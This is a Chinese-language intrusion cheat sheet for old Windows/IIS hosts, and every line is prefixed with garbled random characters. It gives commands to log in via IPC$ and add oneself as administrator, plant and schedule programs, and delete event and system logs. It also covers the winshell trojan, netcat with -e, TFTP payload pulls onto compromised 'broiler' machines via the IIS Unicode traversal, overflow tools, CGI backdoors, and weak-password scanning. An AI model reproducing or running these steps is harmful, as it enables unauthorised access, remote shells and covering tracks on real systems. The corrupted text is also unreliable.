网管和黑客都必须知道的命令
#;�;�A~d:V 常用的几条NET命令:
e YiqT�Wn: Ypi�n�bej� (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
{ �/
�,?3 oTTE<Ct�[� (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
$"���6G��v Lg-!,Y��
� (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
�Q*e\I8R}� ajf(��Ii\/ (查看远程主机时间) net time \\IP地址
Pv*]AF;9pQ �z��1.vnGP (定时启动某个程序) at \\IP地址 02:18 readme.exe
"DX��2M�u= /3�8XaKc{6 (查看共享) net view \\IP地址
� :�*t5��? mKUm*m#<�R (查看netbios工作组列表) nbtstat -A IP地址
jm�'^>p,9G }z2[�w�@M� (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
V�LfKN��)g <EY{��goW� (这两条把自己增加到管理员组): net user 用户名 密码 /add
�Pa?C-�Xn^ �meGL�T/
� net localgroup Administrators 用户名 /add
�CWb*�bw0� /H�djP��xH (断开连接) net use \\IP地址\ipc$ /delete
fW=eB�'Sl� 7IrH(~Fo�� 扫尾:
3A.lS+P1�� ���bu=�R�U del C:\winnt\system32\logfiles\*.*
�D&�DbxTi� �m.lzk�S]P del C:\winnt\ssytem32\config\*.evt
"}S6�a?]V ,y�}~rYsP% del C:\winnt\system32\dtclog\*.*
Z
�?F_({im 6yC4�rX!a� del C:\winnt\system32\*.log
RQ�8;_)�%� f7;<jj�;w7 del C:\winnt\system32\*.txt
#W�4
"�^#2 '{)Jhl47 � del C:\winnt\*.txt
y<l�(F?�_ p ^�)�3p5w del C:\winnt\*.log
q��-/t?m0� �9vCCE[�9 一、netsvc.exe
oA;ZDO06�r 1=PTiDMJ<* 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
(N�9��g�6V S.?DR3XLc� netsvc /list \\IP地址
%{?�9�#)�) $�M$-c�{>s netsvc schedule \\IP地址 /query
I2�,A�T+O< gN]\#s�@[� netsvc \\IP地址 schedule /start
�~9@�83Cs2 n�W
oh(�a 二、OpenTelnet.exe
O-3a��U!L @]A��c >& 远程启动主机的Telnet服务,并绑定端口到7878,例如:
D J7U6{KLq ��hV
fANbs OpenTelnet \\IP地址 用户名 密码 1 7878
@E>I<j,D� !x")��uYf� 然后就可以telnet到主机的7878端口,进入DOS方式下:
=VV><^uzdY $�KP&#�;9� telnet IP地址 7878
M�H�A_b^7? \p^'[B(O77 三、winshell.exe
thE�9fr/ d)d0�,fi?- 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
�v[)8 1�uY s�(�r4m�/� p Path (查看winshell主程序的路径信息)
KxWm6��3"� *JZ�l�G%z� b reBoot (重新启动机器)
v�x}B�T�H� >�Sb3]�$$� d shutDown (关闭机器)
}hcY5��E-n o4ag�a�A3k s Shell (执行后你就会看到可爱的“C:\>”)
`��A����-� vhDtj�f�/* x eXit (退出本次登录会话,此命令并不终止winshell的运行)
�[$#�G|>�x u-Q�HV1H`( CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
RrdLh� z2N OP��\��L� 四、3389登陆器,GUI方式登录远程主机的
1\g� r
�;b `O`MW} �c� 五、elsave.exe
*U`R<�mV\ AS'+p��%(� 事件日志清除工具
2rb@Md]dx� �=q*c}8R_0 elsave -s \\IP地址 -l "application" -C
�y�q[@C��w b���y\Sq}� elsave -s \\IP地址 -l "system" -C
l�b�C,*�U^ |�7${��E^u elsave -s \\IP地址 -l "security" -C
#a�i�I]�'� &=XK�:+�� 执行后成功清除应用程序日志,系统日志,安全日志
|������/�n 7xfS%'=�y" 六、hbulot.exe
3$.#\*s�_4 \s!x;n�w�[ 开启win2kserver和winxp的3389服务
pF(6M�3>IN #$F*.vQSs+ hbulot [/r]
kdaq_O:�s� M`E}1WNQ?] 使用/r表示安装完成后自动重起目标使设置生效。
1�M�m��EP Qj�$w��7*U 七、nc.exe(netcat.exe)
0E)M6�
jJ nj1PR`�AE� 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
,H1�K� sN� �/U`p|�M�; 想要连接到某处: nc [-options] hostname port[s] [ports] ...
}���d��aU/ f�B]NEx|o~ 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
�^]Z@�H/]H KLG��2��9G 参数:
YOU�B%N�9+ �=��|2F?�� -e prog 程序重定向,一旦连接,就执行 [危险!!]
p�7HLSB2Rp �U+C�^"�[B -g gateway source-routing hop point[s], up to 8
:}-?�X�\|\ {WQ6�=wGpS -G num source-routing pointer: 4, 8, 12, ...
��vKfjP_0$ N�K�'@.=�$ -h 帮助信息
S�h��?e��b k|�{� 4"4r -i secs 延时的间隔
/_YT�OSZjm y|zIu�I�-p -l 监听模式,用于入站连接
>�]o>iOz;] Z]�x�6�n�p -n 指定数字的IP地址,不能用hostname
O%haaL�\�� &gUa^5�'�# -o file 记录16进制的传输
6�Nt/>[��� A(n#k&W1fZ -p port 本地端口号
0Ue~dVrM(? N
Hn�#�c3o -r 任意指定本地及远程端口
\jmZ�t*��c ���e�N\+� -s addr 本地源地址
�NE�v�N��j MSR�k|0Mcr -u UDP模式
�yvnDS"0�< $PAAmai�gi -v 详细输出——用两个-v可得到更详细的内容
!Ce�!D0Tx� .2s^8�g��O -w secs timeout的时间
*2rc� ��Y
tG�zp=�PyA -z 将输入输出关掉——用于扫描时
hljKBx��~ 八、TFTPD32.EXE
�_O��;4�> CG�kx��_E] 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
B^/k�`h6J� o\; hF�3 � http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
�uPj�p5�;V f1;@a�>X�
然后可以直接令文件运行:
�FC�W�k8�/ �ael] {'h] http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
�Z�Kq#PB/. ��o��Z�^,* 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
e�ct$g�#� �`S�.�I,<& 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
mx�
UyD[�| s`0IyQX�VU 一、一 Xscan命令行运行参数说明:
W�/}_�y8q� HF�lExa�u� 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
�
s���FnR; �*��N�}$~N 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
Nh�}�u]<�B ~"<���^�4h xscan -file <主机列表文件名> <检测项目> [其他选项]
|l�Zp5M�Oc ~s�PXkLqK
其中<检测项目> 含义如下:
_N)&�<'lB< �1iNMg���A -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
</1]��eDnU d>���F.�C> -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
� ST0TWE' r-*6#
���" -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
�GN:|b2 "� j>�uu3ADd2 -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
O:GAS� [O` >/l��B%<$/ -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
*'-t_F';� >�,h��{�`� [其他选项] 含义如下:
^E�:-�U�y
ByO�?qft>u -v: 显示详细扫描进度
�5�7 �Bx- �;R
�Jv7@� -p: 跳过Ping不通的主机
�fOM�E&$=O YbnXA�i\y| -o: 跳过没有检测到开放端口的主机
DHv86�TvJt 9+��xO2�n� -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
